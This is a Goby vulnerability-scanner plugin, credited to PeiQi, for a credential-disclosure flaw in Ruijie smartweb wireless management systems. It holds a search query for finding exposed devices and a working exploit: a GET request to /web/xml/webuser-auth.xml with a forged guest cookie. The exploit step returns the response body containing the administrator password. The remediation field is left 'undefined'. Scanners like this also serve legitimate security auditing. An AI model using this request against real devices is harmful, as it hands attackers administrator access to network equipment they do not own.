Goby/json/Ruijie_smartweb_password_information_disclosure.json

{
      "Name": "Ruijie smartweb password information disclosure",
      "Level": "2",
      "Tags": [
            "Disclosure of Sensitive Information"
      ],
      "GobyQuery": "app=\"Ruijie-WiFi\" && title=\"无线smartWeb--登录页面\"",
      "Description": "The wireless smart web management system of Ruijie Network Co., Ltd. has a logical flaw. The attacker can obtain the administrator account and password from the vulnerability, and then log in with the administrator authority",
      "Product": "Ruijie smartweb",
      "Homepage": "http://www.ruijie.com.cn/",
      "Author": "PeiQi",
      "Impact": "<p>The attacker can obtain the password of the administrator account from the vulnerability, and then log in with the administrator authority.<br></p>",
      "Recommandation": "<p>undefined</p>",
      "References": [
            "http://wiki.peiqi.tech"
      ],
	  "HasExp": true,
	  "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/web/xml/webuser-auth.xml",
                        "follow_redirect": false,
                        "header": {
                              "Cookie": "login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest"
                        },
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "<![CDATA[   admin]]>",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
	  "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/web/xml/webuser-auth.xml",
                        "follow_redirect": false,
                        "header": {
                              "Cookie": "login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest"
                        },
                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "<![CDATA[   admin]]>",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
					"output|lastbody"
				  ]
            }
      ],
      "PostTime": "2021-04-04 12:41:15",
      "GobyVersion": "1.8.255"
}